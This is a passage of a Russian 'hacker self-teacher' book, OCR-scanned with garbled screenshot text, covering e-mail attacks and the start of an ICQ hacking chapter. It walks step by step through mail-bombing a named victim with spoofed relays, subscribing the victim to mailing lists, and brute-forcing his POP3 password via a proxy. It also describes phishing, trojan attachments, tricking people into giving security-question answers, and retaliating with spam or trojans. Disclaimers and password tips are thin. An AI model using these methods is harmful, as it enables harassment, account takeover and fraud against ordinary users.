Для настройки DnD используется группа элементов управления Settings
(Настройка), расположенная внизу рабочего окна программы DnD (см. Рис. 6.1).
Для настройки DnD в группе элементов управления Settings (Настройка) следует
установить следующие параметры:
> В поле с открывающимся списком SMTP Host (Хост SMTP) выберите из списка, либо введите сами адрес ретранслирующего SMTP-сервера, который будет использоваться для рассылки спама. Мы будем использовать свой SMTPсервер Sword-2000.sword.net.
> В открывающемся списке Spoof Host (Поддельный хост) укажите название
несуществующего хоста, которое будет отсылаться на атакуемый компьютер.
Это название должно состоять из одного слова, которое также можно выбрать из открывающегося списка.
Флажок Randomly Change (Случайная замена) позволяет задать режим,
при котором каждое письмо будет
пересылаться через случайно выбранный SMTP-сервер.
> Если необходимо отредактировать
список SMTP-серверов, щелкните
на кнопке Edit Server List (Редактировать список серверов). На экране появится диалог Random
Server List (Список случайных серверов), представленный на Рис. 6.2.

•^ Random Servei List
orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net
stjohns.edu

] Imalasada.lava. | lpressentef.com | |cyberhighway.n|

mail.sisna.com| | why.net

|widQwmaker.co| Iclubmet.mettob |

wwa.com J |nyx1G.cs.du.ed| | clinet.fi
soi.hypeichalcl rdagobert.rz.uni-jl lspace.net
tka.com
ihZOOO.nel

| Iplix.conr

j jcabletegina.co |
J |maple.nis.net

|

Idubmet.metrob | ltMvl.net
| vitro, com

Puc. 6.2. Диалог для правки списка
ретранслирующих SMTP-серверов

Для коррекции списка SMTP-серверов щелкните на нужном поле в диалоге
Random Server List (Список случайных серверов) и

отредактируйте его.
Для сохранения изменений щелкните на кнопке Submit (Утвердить).
В группе переключателей Size of Bomb (Размер бомбы) (Рис. 6.1) установите
один из переключателей для выбора числа передаваемых писем:
• Выбор # of messages to send (Число сообщений для отправки) позволяет
в соседнем справа поле задать число передаваемых сообщений. В нашем
случае задайте 10.
• Выбор Never ending bomb (Бесконечное число бомб) приводит к нескончаемой передаче сообщений.

85

Самоучитель хакера
Check the box and then fill in the information that will appear in the
headers under that category; or uncheck the box to remove it from
the headers.
П X-Mailer:

|

П X-URL:

|

П X-Sender:

|

П X-Date:

|

Q Return Path: [
Q References: |
П Priority:

I

Q X-Authenlication Warning
| Generate IP |

|124.49.153.SO

Ok

|

[TedGilsdorf
Clear

Cancel

Puc. 6.5. Ввод заголовков MIME также поможет замести следы

АН13ка клонов
Кроме описанных возможностей, в программе DnD имеется несколько дополнительных средств, помогающих в рассылке спама своим жертвам. Среди важнейших средств досадить своему недругу упомянем возможность рассылки клонов почтовых бомб, посылаемых одновременно по одному или нескольким адресам,
с использованием одинаковых настроек мейлбомбера.
Чтобы запустить клона, можно щелкнуть на кнопке Clone (Клон) в диалоге
E-Mail bomb (Почтовая бомба) и отобразить диалог Bomber Spawn 1 (Генератор
бомб), представленный на Рис. 6.6.
-a Bomber Spawn 1

ЯШЁГ

1

Sendbombto:

Г-1

Say bomb is from:

ГЛ ЕЭ Randomly Change

Message Subject:

| |

l

Random

|

Message Body:

1
SMTP Server:

ГП gl Randomly Change

ya

ll§nll°ml| I Edit Headers | | Abort || Clear

£j?

[Status

I

{Messages Sent! |0

|

Puc. 6.6. Диалог создания клонов
88

Деструкция почтового клиента
Как видим, диалог Bomber Spawn 1 (Генератор бомб) создания и рассылки клона практически совпадает с диалогом E-Mail bomb (Почтовая бомба) и служит
для той же цели — создания почтовой бомбы и рассылки ее по указанному адресу
через ретранслирующие SMTP-серверы. Преимущество рассылки клонов состоит в возможности параллельной отправки множества писем, идущих к адресату
через множество SMTP-серверов. Теперь-то этому ламеру Коле не устоять — получив сотни писем со всех сторон света, он не захочет и близко подходить к забитому епамом почтовому ящику! Ведь от такой атаки не спасут даже средства
фильтрации электронной почты — множество использованных адресов источников весьма затруднит решение такой задачи.
Если же вы хотите совсем уж добить Колю, можно создать множество клонов столько, сколько потянет обработать ваш компьютер и линия связи (не увлекайтесь — их ресурсы вовсе не беспредельны).
>• Чтобы создать множество клонов, в главном окне мейлбомбера DnD выберите команду меню Clones » Load Multi Clones (Клоны * Загрузить множество клонов). На экране появится диалог Number of clones (Количество
клонов), представленный на Рис. 6.7
Number of clones
How many clones do you want to load?

L

J

Puc. 6.7. При задании числа клонов
будьте благоразумны — компьютер не резиновый!
> В диалоге Number of clones (Количество клонов) укажите число клонов (оптимально 5-6) и щелкните на кнопке ОК.
В главном окне отобразится указанное число диалогов Bomber Spawn №
(Генератор бомб), пронумерованных от 1 до № — в зависимости от указанного
количества клонов. Настройте параметры клонов аналогично настройке почтовой бомбы и щелчками на кнопке Send Bomb (Послать бомбу) направьте эту
армаду клонов по адресу ламера Коли. Можно с уверенностью сказать — такая
атака клонов ему будет не по вкусу!

Ко&ро&ое бомбометание списками рассылки
Но и это еще не все! Ведь существует такая прекрасная вещь, как списки рассылки — включив в них свою жертву, можно с уверенностью предречь целую
89

Самоучитель хакера
кучу неприятностей владельцу почтового ящика! И программа DnD предлагает
для этого целый набор списков рассылки, который можно открыть, выбрав команду меню Mailing lists (Списки рассылки). Отобразившийся диалог Subscribe
joe lamer to mailing list (Подписка ламера на список рассылки), представленный
на Рис. 6.8, предложит вам подписать своего врага на такие интересные вещи,
как Euro Queer (Европейское чудо), Mormons (Мормоны), Family Medicine
(Семейная медицина) и так далее и тому подобное — в списке найдется подписка
на любые вкусы!
Я1=Ш1

*i Subscribe joe lamei to a mailing list!

Subscribe your enemy to a mailing list • even worse then a mailbomb!
More lists coming next version..sorry lor the small quantity (his lime.
My apologies for the bad usability but I will use checkboxes instead of option boxes
next version..
©Jewish List

О CMd Parenting

Targets email address:

[

О Digital Queers О Gay Quakers

Targets fits! name:

|j0hn

О Mormons

О Christianity

Targets last name:

|роп

О Gay/Lesbian

О womanism

О Euro Queer

О ВЫ people

О Lesbians over 40

О Bi Australians

О Family Medecine

О Allergies

Puc. 6.8. Списки рассылки программы DnD могут удовлетворить любые вкусы
Недаром разработчик программы DnD считает подписку на список рассылки
оружием пострашнее мейлбомбинга. Введите адрес своего врага в поле Target
Email Address (Адрес назначения), и щелкните на кнопке Subscribe em
(Подписать) — все остальное программа сделает сама. И ваш недруг очень удивится, когда к нему будут поступать назойливые сообщения со всякими сомнительными советами и предложениями.

Дополнительные вооружения
Кроме рассылки почтовых бомб и клонов, а также подписки жертв на списки
рассылки, мейлбомбер DnD оснащен дополнительными вооружениями, однако,
как признается автор программы, их работа плохо тестирована. Среди этих инструментов выделим утилиту генерирования паролей, запускаемую командой
меню Extras » Pword generator (Дополнение * Генератор паролей). При этом
открывается диалог Randomic Password Generator (Генератор случайных паролей), представленный на Рис. 6.9.
Чтобы сгенерировать пароль, следует в поле How many characters? (Сколько
символов?) указать его длину (стандартные требования — не менее 8 символов) и
с помощью переключателей выбрать: Use Both (Использовать оба) — использование в пароле и буквы и цифры, Use numbers (Использовать цифры) — исполь90

Деструкция почтового клиента
зование в пароле только цифры или Use
letters (Использовать буквы) — использование в пароле только буквы. Программа-генератор на первый взгляд работает неплохо, однако буквы генерируются только в нижнем регистре, что
ослабляет криптостойкость созданных
паролей.

•*В Randomic Passwoid Geneialor

ттт

Jusl click to generate a random password. Choose how long
you want it to be by the number ol characters.
How many characters? [12 |
© Use Both

О Use numbers О Use letters

6i2i9e1m5p8i

Close

Clear box

В меню Extras (Дополнение) имеются и
другие инструменты — удаленного Рис. 6.9. Генерация случайных паролей
управления SMTP-хостом (пункт меню
SMTP Remote (Удаленное управление SMTP)), подключения к портам сетевых
компьютеров (пункт меню Raw Port (Вскрытый порт)). Все эти средства очень
полезны для взлома почтовых серверов, но требуют знания почтовых протоколов (в частности, команд SMTP). А щелчок на пункте меню Other Tools
(Другие инструменты) открывает диалог с целым набором инструментов сетевого хакинга. Однако мы не будем здесь рассматривать эти инструменты — это вопрос, обсуждаемый в следующих главах, где будут описаны более совершенные
инструменты сетевого хакинга.
Итак, мы решили первую задачу — «зафлудили мыло» своего недруга; теперь
самое время подумать о более рациональной трате своих сил. В самом деле, ну
погорюет ламер Коля о потере своего почтового ящика, так ведь и новый открыть недолго. Более содержательная атака состоит во взломе доступа к почтовому ящику своего недруга, что даст хакеру воистину безграничные возможности по доведению ламера до кондиции (зависящей от криминальных наклонностей хакера). Итак, рассмотрим хакерские технологии взлома почтовых ящиков.

паролей к почтовому яшику
Самая простая технология состоит в подборе паролей к почтовому ящику своего
недруга путем простого перебора всех вариантов логинов и паролей для входной
регистрации. Программы, реализующие такую технологию, действуют очень
просто — они подсоединяются к почтовому серверу по протоколу РОРЗ (или
IMAP) и посылают ему запросы на авторизацию, изменяя логины и пароли. Если
попытка регистрации удалась — почтовый ящик взломан.
Примером программы такого рода является Brutus Authentication Engine Test 2
(Машина Brutas для аутентификационного тестирования, версия 2), сокращенно
Brutus AET2 (http://www.hobie.net/brutus). На Рис. 6.10 представлен главный
диалог программы Brutus, содержащий все необходимые инструменты взлома
паролей доступа к почтовому серверу РОРЗ, серверу FTP, HTTP, Telnet и даже
троянскому коню NetBus.
91

Самоучитель хакера

»1

I Biulus • AET2 — www.hoobie.net/biutu: — (January 2000)
lie

1

Tools

Target

(SisJEI

Help

|127.0.0.1

|

Ti»pe|POP3

|~| | Start

| Stop [Clear


Port (110

Connections ИЩШИИИНМ 10 Timeout ФЩ^Щ} 10

|

П Use Proxy | Drf»» |

|B’?S..?®.^.P.9.?.l| D Try to stay connected for [Unlimite |
^
| attempts

.

.

.

0 Use Username

П Single Usef

User File | users.txt

Pass Mode [Word List «p|
| | Browse |

pass pje jwords.txt

| | Browse |

Positive Authentication Results
Target

I Type

5J
II

I Username

|
II

ТЫюи)

I Password

R«*cl

AuthSeq

I

Throttle Quick Ki

ll>dle

*

Puc. 6.10. Главный диалог программы Brutus весьма содержателен

В этой главе мы рассмотрим средства взлома почтового сервера РОРЗ, оставив в
стороне другие средства программы Brutus (в главе 8 мы опишем применение
Brutus для взлома доступа к серверу IIS). В качестве жертвы мы изберем опятьтаки ламера Колю, хранящего свою почту по адресу alex-1 .sword.net, с учетной
записью kolia. На первый раз ограничимся взломом только пароля, считая, что
логин нам известен — его можно добыть многими другими способами, о которых
мы поговорим чуть позже.
Для взлома почтового ящика ламера Коли выполним такие шаги.
>• В диалоге Brutus — АЕ2 (Рис. 6.10) в поле Target (Цель) укажите адрес почтового сервера РОРЗ, в данном случае alex-1.sword.net.
>• В открывающемся списке Туре (Тип) выберите тип взламываемого сервера,
в данном случае РОРЗ.
>• В группе элементов управления Connection Options (Параметры подключения) не забудьте установить флажок Use Proxy (Использовать прокси), если
вы работаете с реальным почтовым ящиком — это позволит вам сохранить
анонимность.
>• В группе элементов управления Authentication Options (Параметры авторизации) установите флажок Single User (Единственный пользователь) — теперь
программа будет искать пароль для одного пользователя.

92

Деструкция почтового клиента
х В поле User file (Файл пользователя) ведите логин для взламываемого почтового ящика, т.е. имя учетной записи Коли — kolia.
>• В открывающемся списке Pass Mode (Способ взлома) выберите Brute Force
(Прямой перебор). Диалог программы Brutus примет вид, представленный на
Рис. 6.11.

тшт

X Biutus — АЕТ2 — www.hoobie.net/biuluit — (January 2000J
File

Tool.

Target

Help

|alex-1.sword.net

[T| | Start | Slop | Clear |

Type|POP3

nnection Optioru

P

>orl [110

|

I 10

I 10 Timeout

Connections

П Use Proxy I Define!

IPS Options-

| Modify sequence |

П Try to slay connected for |Untmil8 |-r | attempts

-Authentication Options
0 UseUsemame
UserlD

Pass Mode [Brute Force|—1 |[Kange|| | Dfellfcuted |

0 Single User

| kolia

Positive Authentication Results
I Type

Target

I Username

| Password

R«t»et

AuthStq

|

Throttle Quick Kil

Puc. 6.11. Настройка программы Brutus для взлома сервера POPS
Обратите внимание на появившуюся после выбора способа взлома кнопку Range
(Диапазон). Щелчок на копке Range (Диапазон) открывает диалог Brutus — Brute
Force Generation (Brutus — Генерирование паролей прямым перебором), представленный на Рис. 6.12.
Biutus — Biule Foice Generation
© Digits only

Min Length [

О Lowercase Alpha

Max Length [4 [T

О Uppercase Alpha
О Mixed Alpha

Cancel

О Alphanumeric
О Full Keyspace
О Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! |

Puc. 6.12. Диалог выбора символов и длины взламываемого пароля

93

Самоучитель хакера
В диалоге Brutus — Brute Force Generation (Brutus — Генерирование паролей
прямым перебором) делается основной выбор — следует оценить, какой длины
может быть пароль у Коли, и какие символы он может применить. Учитывая,
что Коля — неопытный пользователь, мы выберем в поле Min Length (Минимальная длина) число 3, а в поле Max Length (Максимальная длина) — число 4. Применяемые символы мы ограничим цифрами, установив переключатель Digits only
(Только цифры).
Теперь все готово для атаки.
> Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 и наблюдайте за
сообщениями и линейным индикатором внизу диалога Brutus — АЕ2. Результат представлен на Рис. 6.13.
В 1=1 ЕЭ

X Uiutus — АЕТ2 — www.hoobie.net/biutus — [Januaiy 2000J
File

Took

Help

Target | alex-1.sword.net

EJ | Start | Stop | Clear |

Type|POP3

i-Connection Option*
I

Port [110

|

Connections

10

10 Timeout

rPOlP3 Options| Modify sequence |

I?

D Try to stay connected for |Unlimite | •> | attempts

-Authentication Options
El Use Username
UserlD

Pass Mode [Brute Force [

0 Single User

I Range

DisllbAed

[kolia

Positive Authentication Results
Target
alex-1.sword.net

I Type
POP3

| Username
kolia

I Password
0007

I

Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts

Timeout
10997

Uikolia P:0000

~]|37 Attempts per second

Reject

Throttle

Quick И

|Idle

Puc. 6.13. Пароль почтового ящика номера Копи взломан1.
Из записи в поле Positive Authentication Results (Положительные результаты
аутентификации) видно, что пароль учетной записи kolia найден — 0007. Там же
можно увидеть, что в процессе взлома программа Brutus выполнила 10997 попыток регистрации на почтовом сервере alex-1.sword.net (всего их число равно
11000). На это было потрачено почти 5 минут работы компьютера Pentium 3 с
частотой процессора 1000 МГц, связанного с почтовым сервером через сеть
Ethernet с пропускной способностью 10 Мбит/сек.
Теперь можно трезво оценить, чего стоят средства взлома паролей почтовых
ящиков методом подбора паролей, подобные программе Brutus (а их достаточно

94

Деструкция почтового клиента
много). Во-первых, не все пользователи такие ламеры, как Коля, и поэтому выбирают пароли достаточной длины (минимум 8 символов!), используя при этом
буквы, цифры и спецсимволы клавиатуры (например, л&$ и т.д.). Взлом таких
паролей потребует неимоверных ресурсов! Для практики попробуйте в диалоге
Brutus — Brute Force Generation (Brutus — Генерирование паролей прямым перебором) выбрать длину пароля 8 символов, а переключатель выбора символов
установите в позицию Full Keyspace (Вся клавиатура). Щелчок на кнопке Start
(Старт) отобразит в диалоге Brutus — АЕ2 фантастическое число всех вариантов
поиска — 6 095 689 385 410 816 — непонятно даже, как его написать словами!
А если выбрать 12 символов?
Несколько лучше выглядит перспектива словарной атаки, когда при поиске паролей используется словарь, в частности, наиболее часто употребляемых слов
(см., например, перечень в [10]). Эти средства также представлены в Brutus, и
для их использования следует выбрать режим атаки со словарем в поле Pass
Mode (Способ взлома). Однако учитывая количество слов в английском языке
(около 100 000), да еще и наличие в нем склонений и спряжений, такие атаки
также не вызывают энтузиазма. Ну разве что можно попробовать сотнюдругую излюбленных ламерами паролей, типа password, parol, MyPassword
и так далее — на хакерских Web-сайтах и компакт-дисках часто можно найти
словари подобного рода.
Во-вторых, все такие попытки аутентификации чаще всего выполняются через
удаленное соединение, пропускная способность которого на несколько порядков
ниже, чем у соединения через Ethernet, и не превышает 30-50 Кбит/сек (и это
еще хорошо). Есть и третье соображение — следует учесть возможности системы
защиты почтового сервера. Вряд ли нынче существует хоть где-либо почтовый
сервер, не ограничивающий число попыток входной регистрации — такие серверы нынче просто не выжили бы, как динозавры или мамонты, под напором
«кул хацкеров», преисполненных желания вломиться на чужую территорию и
все там сокрушить.
Все это заставляет задуматься о практической применимости средств для взлома
почтовых ящиков путем простого перебора логинов и паролей входной аутентификации. Учитывая наш эксперимент, можно заключить, что хакерам не остается ничего другого, как искать дыры в системе защиты почтовых серверов,
прибегать к мошенническим уловкам и уповать на глупых системных администраторов, не поддерживающих железный порядок в проведении политики безопасности для компьютерной системы организации. Первым пунктом этой политики должно быть правило использования сложных паролей достаточной длины.
Второе правило должно требовать неукоснительной замены паролей не реже
раза в месяц — иначе и в самом деле возникает риск взлома, хотя бы через локальную сеть организации.

95

Самоучитель хакера
Насчет дыр в системе защиты серверов IIS и использовании для их взлома программы Brutus мы еще поговорим в Главе 8 этой книги, а здесь нам осталось обсудить одну интересную тему — методы социальной инженерии. Проще говоря,
это мошенничество и прочие уловки, к которым прибегают наиболее изобретательные хакеры для взлома почтовых серверов. Эти методы для практиков представляют наибольший интерес, поскольку, как мы убедились, прямой взлом
почтового сервера — дело почти безнадежное, а вот обходные пути — это еще как
сказать! Ведь недаром поется в одной песенке: «Нормальные герои всегда идут в
обход!». Так что приступим к обходным маневрам.

Методы социальной инженерии
Самый простой и надежный метод получения пароля доступа к почтовому серверу, а также и вообще к любому сервису Интернета, состоит в рассылке мошеннических писем, имеющих целью вынудить ламера самому сообщить свой
пароль. В Главе 1, в самом начале, приведено одно такое письмо, якобы от провайдера Интернета, приглашающее получателя указать «новый» пароль для защиты своего доступа к серверу Интернета. Это — неприкрытое мошенничество,
поскольку системные администраторы, что бы там о них не писалось в различных хакерских изданиях, никогда не опускаются до такой глупости, как запрос у
пользователей их паролей по электронной почте. Тем не менее, такой прием
срабатывает — ведь нынче к освоению Интернета ежедневно приступает множество доверчивых новичков (все мы когда-то были новичками), так что шансы на
успех неплохие.
Другой, более технически продвинутый метод — рассылка писем с вложениями,
содержащими злонамеренный программный код. В предыдущей главе мы рассмотрели несколько таких атак на компьютер ламера Коли. Как вы помните, в
результате атаки TFTP на компьютер А1ех-1 было записан и запущен код в активном вложении электронного письма, после чего компьютер А1ех-1 превратился в сетевого раба хакера Пети. Надо сказать, что хотя описанная атака TFTP
весьма эффектна, ее вряд ли можно назвать эффективной. Ведь если компьютер
позволил открыть неаутентифицированный сеанс связи по протоколу TFTP для
записи файлов на диск компьютера, то его система защиты настолько слаба, что
для взлома можно попробовать другой метод, попроще и понадежнее. Количество компьютеров, подсоединенных к Интернету вообще без всякой защиты, воистину безмерно, и с точки зрения хакера, бродящего по киберпространству в
поисках поживы, такой компьютер напоминает виртуальный дом с открытыми
настежь дверями и окнами.
Рассылка писем с вложениями представляет собой наилучший способ внедрения
троянов. Применяемая при этом техника обмана пользователей весьма проста разослав кучу писем с вложенной программой инсталляции трояна, хакер ждет,
96

Деструкция почтового клиента
когда доверчивый получатель письма щелкнет на кнопке (или ссылке) для открытия вложения. Чтобы привлечь внимание, это вложение рекламируется в
письме как, допустим, «бесплатное» обновление Web-браузера или «пакет бизнес-программ» и т.п. (и это только часть того, что доводилось находить в своем
почтовом ящике). Щелчок для открытия вложения запускает программу инсталляции. На компьютере-жертве устанавливается, например, троян, который сообщает хозяину о своем успешном внедрении по конкретному ГР-адресу.
Все остальное очень просто. Если внедренный троян — «ленивый», т.е. работает
как обычный кейлоггер, он будет постепенно передавать всю информацию о
ваших действиях своему хозяину — и, в числе прочего, передаст все введенные
вами пароли. Если же троян «активный», т.е. поддерживает средства удаленного
управления, он позволит своему хакеру подключаться к компьютеру-жертве и
делать на нем что угодно — фактически стать владельцем всех информационных
ресурсов компьютера. Вот недавно, в конце 2002 г., в Москве накрыли одну такую компанию «кул хацкеров», занятых рассылкой троянов, которые выведывали
пароли доступа к провайдерам Интернета у незадачливых получателей писем.
Потом эти пароли продавались прямо с Web-странички. Потом за этими «хацкерами» пришли. Потом их посадили. Так что думайте…
Вот еще один эффективный метод обхода защиты почтовых сервисов (и не
только их). На Web-страничках, предоставляющих сервис электронной почты,
очень часто можно встретить строку типа Забыли пароль?, позволяющую восстановить забытый пароль доступа. Щелчок на этой строке предлагает ввести
ответ на вопрос, который вы выбрали при регистрации на почтовом сервере например, Ваше любимое блюдо?, Девичья фамилия матери?, Как зовут
Вашу собачку? и так далее. Такой способ восстановления доступа к почте — это
настоящий Клондайк для понимающего человека, поскольку число блюд, имен и
фамилий не так уж и велико и, к тому же, их можно выведать у самого хозяина
почтового ящика. Для этого можно, скажем, написать ламеру письмо и пригласить его на свой любимый чат, а там, завоевав доверие, выведать у него все эти
сведения. Скажем, если в непринужденной виртуальной беседе узнать у ламера
Коли, что его любимое блюдо — пареная репа, то можно попытаться проникнуть
в его почтовый ящик, указав в ответ на запрос о любимом блюде строку типа
гера или repa_parenaia, ну и так далее — побольше фантазии!

Заключение
Описываемые в главе методы не без основания кое-где называются террористическими. Поэтому хакер, прежде чем приступить к их использованию, должен отчетливо понимать свои перспективы, могущие появится на горизонте
при неосторожном обращении с такими разрушительными орудиями, как
мейлбомберы и взломщики паролей почтовых серверов. Основное предна97
4 — 5830

Самоучитель хакера
значение таких приспособлений — хулиганство, шантаж, вандализм, дискредитация своей жертвы путем опубликования личной переписки и так далее и тому
подобное — что ни деяние, то статья уголовного кодекса. Так что всем желающим испытать эти инструменты на практике автор настоятельно советует ограничиться экспериментальной интрасетью.
Антихакер должен знать эти инструменты не хуже хакера, поскольку с их помощью можно решить кое-какие задачи активной обороны. Став объектом
спэмминга или подвергнувшись атаке взлома пароля почтового ящика, можно
попробовать вычислить почтовый адрес своего обидчика и ответить ему той же
монетой. К примеру, можно забросать его спамом (вернуть обратно полученное
письмо десять раз) или поместить в свой почтовый ящик письмецо с трояном глядишь, и подловишь зазевавшегося «кул хацкера» на горячем — нечего лазить
по чужим ящикам!
К мерам пассивной обороны следует отнести такие меры.
• Используйте сложные пароли доступа к почтовому серверу, длиной не менее
8 (лучше 12) символов, включающих буквы, цифры и спецсимволы. Лучше
всего использовать генераторы случайных паролей, подобные предлагаемому
в DnD инструменту.
• Заменяйте пароли доступа к почтовому серверу не реже одного раза в месяц.
• Обязательно обзаведитесь антивирусной программой, поддерживающей контроль почтовых вложений на наличие вирусов — например, Norton Antivirus
или MacAfee VirusScan.
• Чтобы исключить раскрытие конфиденциальности переписки, пользуйтесь
шифрованием — для этого идеально подходит программа PGP Desktop Security.
• Для защиты от спама следует настроить почтовые фильтры, не пропускающие письма с определенными адресами отправителей.
• Наконец, универсальный совет — не будьте ламером, не доверяйте никому, не
открывайте никакие вложения, полученные неведомо откуда неведомо от кого.
Про передачу паролей и прочих закрытых данных по почте в открытом виде
забудьте навсегда — а если требуется переслать хоть сколько-нибудь конфиденциальные данные, применяйте надежное шифрование.

98

Г Л А В А 7.

Хакинг ICQ
Аббревиатура ICQ означает «Intelligent Call Query», что переводится приблизительно как «Интеллектуальный вызов на связь». А еще произношение сокращения
ICQ [Ай-Си-Кью] созвучно фразе: «I Seek You» — «Я ищу тебя»; кроме этого, на
русском языке программу ICQ часто называют просто «аськой». Название ICQ
было присвоено службе Интернета, впервые разработанной и предложенной на
всеобщее употребление в 1998 году компанией Mirabilis, позже продавшей
(за 40 миллионов долларов) свое детище компании AOL.
Служба ICQ известна всем любителям путешествий в Интернете, для которых
ICQ играет роль виртуального пейджера, позволяя связываться со всеми своими
друзьями, которые в данный момент находятся в онлайновом режиме. Путешественник по виртуальным просторам Интернета более не остается в одиночестве везде, где бы он ни был, к нему могут обратиться любые пользователи ICQ, и он
сам может связаться с любым другим путником, сидящим за компьютером в
любой части света. А связавшись друг с другом, можно обменяться сообщениями, переслать друг другу файлы и даже поговорить почти как по телефону — послав голосовое сообщение.
Для работы сервиса ICQ используется сервер, через который происходит поиск
онлайновых собеседников и авторизация клиентов ICQ. Программы клиентов
ICQ можно найти на сайтах, поддерживающих работу ICQ, например,
http://www.ICQ.com, http://mira-bilis.com. Самый известный клиент ICQ так и называется — ICQ с добавлением года создания и версии, например, 1998,1999, 2000,
2002, ныне существует версия ICQ 2003. Для подключения к серверу ICQ клиент
использует порт UDP, номер 4000, а для передачи и приема сообщений — порт
TCP, выделяемый во время сеанса связи.
Каждому клиенту, подключившемуся к сервису ICQ, предоставляется идентификатор UIN (Unique Identification Number — Уникальный идентификационный
номер). Для вызова на связь аськи собеседника достаточно ввести его UTN — и на
компьютере клиента ICQ замигает значок вызова, раздастся звонок или даже голосовое предупреждение о вызове.
Казалось бы, что может быть безобиднее ICQ? Однако в умелых руках сервис
ICQ стал воистину грозным оружием, перед которым пал не один ламерский
компьютер и не один неосторожный пользователь поплатился за длинный язык и
пренебрежение мерами защиты. В чем же тут причина, спросите вы? А вот в чем.

Самоучитель хакера

Агськины
Во-первых, причина особой опасности аськи заключается в предоставлении
пользователям больших возможностей по управлению сеансами связи ICQ, и не
все этими возможностями правильно пользуются. Во-вторых, разработчики клиентов и серверов ICQ плохо спроектировали и реализовали сервис ICQ с точки
зрения безопасности.
Основные угрозы, связанные с сервисом ICQ, таковы:
• Спуфинг, то есть фальсификация UIN посылаемых сообщений, что позволяет
компрометировать своего недруга, рассылая всякую всячину по разным адресам. Это особенно легко сделать, если клиент настроен на получение сообщений ICQ от других клиентов напрямую, минуя сервер — сервис ICQ предоставляет такую возможность. Доказать же, что ты не верблюд, — дело сложное.
• Сетевой хакинг ICQ-клиентов, например, определение IP-адреса своего
ICQ-собеседника, что технически несложно, если общение происходит напрямую. Далее можно воспользоваться разнообразными сетевыми атаками, например, одной из атак DoS, описанных в Главе 9 этой книги. Более того, зная
IP-адрес клиента ICQ, можно совершить полномасштабное вторжение в компьютер доверчивого ламера — определить открытые порты и зафлудить
«аську», или прибегнуть к ICQ-бомберу и забросать клиента ворохом бессмысленных сообщений.
• А какие возможности предоставляет аська для социального мошенничества!
К примеру, втеревшись в доверие к ICQ-собеседнику, можно переслать ему
файл якобы самораспаковывающегося архива якобы с фотографией своей собачки. Запустив полученный файл для «распаковки» архива, вместо загрузки
фотографии пуделя ламер запустит на своем компьютере троянского коня,
который будет сообщать хакеру обо всех действиях ламера, а если этот троянский конь — активный, то и предоставит хакеру средства для удаленного
управления компьютером ламера.
• Уязвимости программного обеспечения клиентов и серверов ICQ, возникшие
по причине пренебрежения программистами компании Mirabilis вопросами
безопасности. Разрабатывая программы и протоколы сервиса ICQ, они оставили в системе защиты ICQ большие дыры, которыми и воспользовались хакеры.
Рассмотрим все эти возможности хакинга по порядку, но вначале поговорим
вот о чем.

100

Хакинг ICQ

Экспериментальная интрасеть
с сервисом ICQ
А теперь о деле. Чтобы не вляпаться по неопытности в какую-либо историю,
настоятельно рекомендуем ознакомиться с возможностями сервиса ICQ и
средств хакинга ICQ на основе локальной сети с установленным сервером и клиентом ICQ. Это создает некоторые неудобства, поскольку многие инструменты
хакинга ICQ созданы для работы исключительно с удаленным соединением; более того, ориентированы на хакинг только отдельных ICQ-серверов (например,
описываемая ниже программа LameToy включает средства исключительно для
хакинга сервера www.mirabilis.com). Тем не менее, настоятельно советуем использовать локальную сеть (а еще лучше ей и ограничиться) наподобие нашей
экспериментальной сети из предыдущей главы, где мы знакомились с хакингом
электронной почты.
Учитывая скандальный характер излагаемого далее материала,
автор вынужден сделать официальное отречение, или, как нынче
говорят, дисклеймер, от всех возможных попыток использования
всех описываемых далее хакерских штучек. Вся изложенная далее
информация служит только для ознакомления пользователей
Интернета с угрозами, присущими сервису ICQ. Автор категорически настаивает на недопустимости использования всех перечисленных средств хакинга по прямому назначению и предупреждает об ответственности.
Построим свою локальную сеть следующим образом. На компьютере Sword-2000
установим сервер ICQ Groupware Server, на компьютерах Alex-З установим
клиент ICQ Groupware Client, который будет исполнять роль хакера с UESf, равным 1001, а на компьютере А1ех-1 установим клиент, который будет исполнять
роль ламера с UIN, равным 1003. Программы сервера и клиента ICQ Groupware
можно найти в Интернете на сайте http://www.icq.com.
Сервис ICQ, реализуемый в локальной сети с помощью программ ICQ
Groupware, имеет некоторые недостатки, однако позволит нам проиллюстрировать
различные угрозы и методы хакинга, применяемые современными «кул хацкерами» наподобие доктора Добрянского из Главы 1. Вообще-то говоря, все описываемые далее методы хакинга ICQ — это полный маразм и отстой, поскольку
реальному хакеру сервис ICQ полезен только как средство выуживания полезных сведений у доверчивых ламеров или для засылки ламерам троянских коней
под видом новогоднего поздравления. Однако приступая к работе с ICQ никому
и никогда не следует забывать о наличии всех этих штучек вроде ICQ-бомберов,
ICQ-флудеров, ICQ-крякеров и тому подобного.

101

Самоучитель хакера

Суть спуфинга UIN заключается в рассылке ICQ-сообщений с подмененным UIN пользуясь знаниями протокола ICQ, хакер создает программу, которая при отсылке сообщения подставляет фиктивный UIN вместо реального. Спуфинг UIN
представляет собой самое настоящее посягательство на права человека в части
ответственности за свои и только за свои поступки. В самом деле, представьте
себе, что кто-то начнет рассылать письма от вашего имени с разного рода инсинуациями по поводу текущих событий и участия в них отдельных личностей.
Отвечать-то придется вам — и кто его знает, чем все обернется.
Чтобы заняться спуфингом, хакеру необходимо специальное программное обеспечение, которое в избытке представлено в Интернете. Наилучшим средством
(судя по отзывам в Интернете) считается программа LameToy for ICQ
(DBKILLER), которую можно найти на различных, пока еще не зачищенных, хакерских сайтах (попробуйте сайт http://icq.cracks.ru/attack.shtml). Работа с программой LameToy for ICQ весьма приятна и необременительна, более того, коекакие функции у программы работают даже в локальной сети. Вкратце опишем
возможности программы LameToy for ICQ.
На Рис. 7.1 представлен диалог, открываемый при запуске программы LameToy for ICQ.
LameToy For Icq [DBKILLER]
| Send [

• Selling-

•Losei-

LLMZ.

I

ЁШШ1ЕЭ

Slop | | Update; | Menu | | Hide [f Exit

JQ044J

Pott ScarmeiГйкЛ-ГпйП |

[Normal Message M
-UlNSniffer-

1ЩЖ.

I Get Local IP 11501

Sendei
miNBIiOOl

[

IPasswdL

l|URL|hHp:/V

Messsage

Puc. 7.1. Диалог LameToy for ICQ (DBKILLER)
предоставляет массу возможностей для хакинга ICQ
Для отправки фальсифицированного сообщения следует только ввести в поле
внизу диалога LameToy for ICQ (DBKILLER) какой-либо текст и щелкнуть на
